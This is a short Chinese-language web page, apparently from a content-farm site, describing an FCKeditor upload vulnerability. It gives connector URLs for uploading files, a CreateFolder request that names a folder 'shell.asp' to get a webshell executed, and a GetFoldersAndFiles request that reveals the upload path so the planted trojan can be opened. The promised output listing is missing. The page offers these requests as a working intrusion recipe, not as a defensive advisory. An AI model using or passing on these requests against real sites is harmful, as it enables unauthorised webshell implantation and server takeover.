电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

FCKeditor上传漏洞找上传路径漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

   

    网上流行着是上传是这样子的

    http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

    http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

    上传后老找不到路径,测了一下,我发现

    FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

    可以爆出路径,显示以下内容

   

    得出路径,直接打开就见到马子了!

相关文章
最新文章
推荐文章

Copyright©2006-2024 优文网 meiwen.anslib.com 版权所有 手机版